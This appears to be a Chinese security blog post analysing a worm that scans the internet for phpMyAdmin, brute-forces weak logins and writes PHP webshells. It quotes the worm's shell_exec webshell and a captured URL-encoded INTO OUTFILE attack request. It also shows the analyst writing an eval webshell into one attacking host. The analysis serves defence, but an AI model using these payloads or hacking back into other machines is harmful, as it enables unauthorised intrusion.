PhpMyAdmin版本扫描溯源分析
溯源背景
此溯源背景为监控恶意行为发现,发现的恶意IP分阶段性进行扫描,扫描特征为对PhpMyAdmin(以下简称phm)的版本号进行扫描,起初几条也就算了,发现类似攻击行为的恶意IP每天不断地出现,于是对其进行溯源分析,经过好些日子的分析,对分析结果总结如下。
分析过程
一、特征分析
首先将有该行为的样本IP进行端口扫描,使用如下指令:
namp -sS -v x.x.x.x
发现基本上都开放Web服务的端口,开放的端口不固定,但基本上均存在Web服务,于是对其Web服务端口进行路径扫描,基本上都存在phm
(部分IP的phm设置访问权限,部分phm可直接免密进入后台管理界面,部分phm的secure_file_priv为空,基本上为xampp部署,均为Linux系统)
以上为对样本IP分析的部分结果,接下来结合微步在线以及反渗透等操作进行下一步分析。
二、样本机分析
这里侥幸遇到一台secure_file_priv为空的样本机,且其phm后台是免密登录的,这里我们可以直接getshell,而绝对路径我们由其中几台的xampp默认界面中的phpinfo页面得到了lampp的默认路径: /opt/lampp/htdocs/
我们直接通过以下语句进行写shell并进行蚁剑连接:
select "<?php @eval($_POST[a]);?>" into outfile /opt/lampp/htdocs/shell.php
我们发现Web根目录下有如下几个文件,我们都挨个查看可知文件内容均为:
PHP7E<pre><?php echo shell_exec($_GET['dmc']);?></pre>
这里还不敢妄下推断,我们继续进行分析,打开虚拟终端输入:
netstat -ano
我们可以看到查询出来很多35段的IP地址(并且这个地址是不断更换的),于是我们使用top指令查询进程,发现top指令报错,于是使用top -bn 1指令进行查询,这次能查询出来了,我们发现一个进程的名很是奇怪:pmacache
于是将其下载查壳发现upx3.96的壳,脱壳,扔进ida静态分析,没发现什么可疑的操作,但是发现其调用了http.go文件,推测其为go语言编写,并且进行了http请求,通过如下指令查看以下该文件执行了什么操作:
ps -ef | grep pmacache
不难看出该程序的启动指令为:
/tmp/pmacache random 18.143.172.75
于是我们开启一台虚拟机进行模拟,将文件拷入后,执行如上命令并使用wireshark抓包,发现逐渐开始请求一些ip地址,当把18.143.172.75改成随意的99.99.99.99后再次观察发现依然会请求一些ip地址,只不过ip段已然不同,查看请求信息以及某一条的tcp流如下:
于是这里便有了一个猜想:该程序是一个病毒程序,通过扫描公网上的ip资产进行端口、网址发现,然后不间断扫描其路径是否包含index.php,因此判断其是对php站点发起攻击,之后逐渐开始扫描phm站点。
三、情报分析
我们将该恶意程序上传至微步沙箱进行分析,发现未分析出恶意行为:
(附样本SHA256:b81a89242a6469c5498746eb60acbfa166088195674ddff2b78b8bc13e694525)需要的师傅可以下载样本进行分析
通过攻击我们的样本IP在微步上可以得到之前师傅贴上的爆破密码样本:
"pma_password=2010&pma_username=root&server=1&token=347c575c4d642867573538222146435b"
攻击流量的部分样本:
"ajax_request=true&bkm_label=&goto=server_sql.php&is_js_confirmed=0&message_to_show=Your+SQL+query+has+been+executed+successfully&pos=0&prev_sql_query=&show_query=0&sql_delimiter=%3B&sql_query=SELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FApplications%2FMAMP%2Fhtdocs%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FApplications%2FXAMPP%2Fhtdocs%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FApplications%2FXAMPP%2Fxamppfiles%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FApplications%2FXAMPP%2Fxamppfiles%2Fhtdocs%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FLibrary%2FWebServer%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FVolume0%2FWeb%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FVolume1%2FWeb%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2FVolume2%2FWeb%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2Fhome%2Fhttp%2F.6d3b738b8eca73aad48fe91fe0ad0e78.php%27%3B%0ASELECT+%22PHP7E%3Cpre%3E%3C%3Fphp+echo+shell_exec%28%24_GET%5B%27dmc%27%5D%29%3B%3F%3E%3C%2Fpre%3E%22+INTO+OUTFILE+%27%2Fhome"
此处攻击流量样本也和我们第一步的特征分析文件对应上了
四、综合分析
通过以上三步分析,我们发现其攻击的完整链为:
1、 感染机通过pmacache文件执行指令pmacache random 18.143.172.75去公网上发现其它pma站点
2、 对存在pma站点的主机进行pma弱口令爆破
3、 爆破成功后通过攻击流量样本进行写shell,然后回连shell进行病毒上传并执行,继续感染公网上其它主机(套娃开始,这也是为什么每天都能监测到扫描pma的告警了)
至此,我们的分析就结束了,留两个小彩蛋:
1、 攻击机的绝大部分phm的账号密码为root/admin
2、 在部分攻击机上发现config.json文件,其记录了加密的账号、密码,其与c3pool.com相关,经查询,此网站为一个挖矿网站,需科学上网才能访问,但不满足挖矿病毒的条件,也不意味着这个病毒就跟该网站有关。经以上分析该病毒软件仅仅是在公网上攻陷phm站点,拿shell权限而已,是否有其它操作,可能还得看对其逆向分析的结果了。
1041
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
